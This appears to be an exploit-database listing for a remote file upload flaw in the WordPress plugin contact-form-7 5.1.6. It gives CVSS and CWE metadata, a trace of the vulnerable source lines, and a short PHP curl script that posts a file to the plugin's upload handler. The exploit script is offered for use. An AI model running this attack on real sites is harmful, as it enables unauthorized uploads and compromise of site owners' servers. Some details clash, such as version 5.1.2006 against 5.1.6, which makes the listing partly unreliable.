header-logo
Suggest Exploit
vendor:
contact-form-7
by:
mehran feizi
7.5
CVSS
HIGH
Remote File Upload
434
CWE
Product Name: contact-form-7
Affected Version From: 5.1.2006
Affected Version To: 5.1.2006
Patch Exists: NO
Related CWE:
CPE: a:contact-form-7:contact-form-7:5.1.6
Metasploit:
Other Scripts:
Platforms Tested:
2020

WordPress Plugin contact-form-7 5.1.6 – Remote File Upload

The vulnerability allows remote attackers to upload arbitrary files to the server.

Mitigation:

Update to the latest version of the plugin.
Source

Exploit-DB raw data:

#  Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload
#  Author: mehran feizi
#  Category: webapps
#  Date: 2020-02-11
#  vendor home page: https://wordpress.org/plugins/contact-form-7/

Vulnerable Source:
134: move_uploaded_file move_uploaded_file($file['tmp_name'], $new_file))
82: $file = $_FILES[$name] : null; 
132: $new_file = path_join($uploads_dir, $filename); 
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); 
121: $uploads_dir = wpcf7_upload_tmp_dir(); 
131: $filename = wp_unique_filename($uploads_dir, $filename); 
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); 
121: $uploads_dir = wpcf7_upload_tmp_dir(); 
128: $filename = apply_filters('wpcf7_upload_file_name', $filename, $file['name'], $tag); 
126: $filename = wpcf7_antiscript_file_name ($filename); 
125: $filename = wpcf7_canonicalize ($filename, 'as-is'); 
124: $filename = $file['name']; 
82: $file = $_FILES[$name] : null; 
82: $file = $_FILES[$name] : null; 
78: ⇓ function wpcf7_file_validation_filter($result, $tag)


Exploit:
<?php
$shahab="file.jpg";
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/contact-form-7/modules/file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$shahab"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>

Location File:
http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg

Navigation

Suggest Exploit

Services By CQR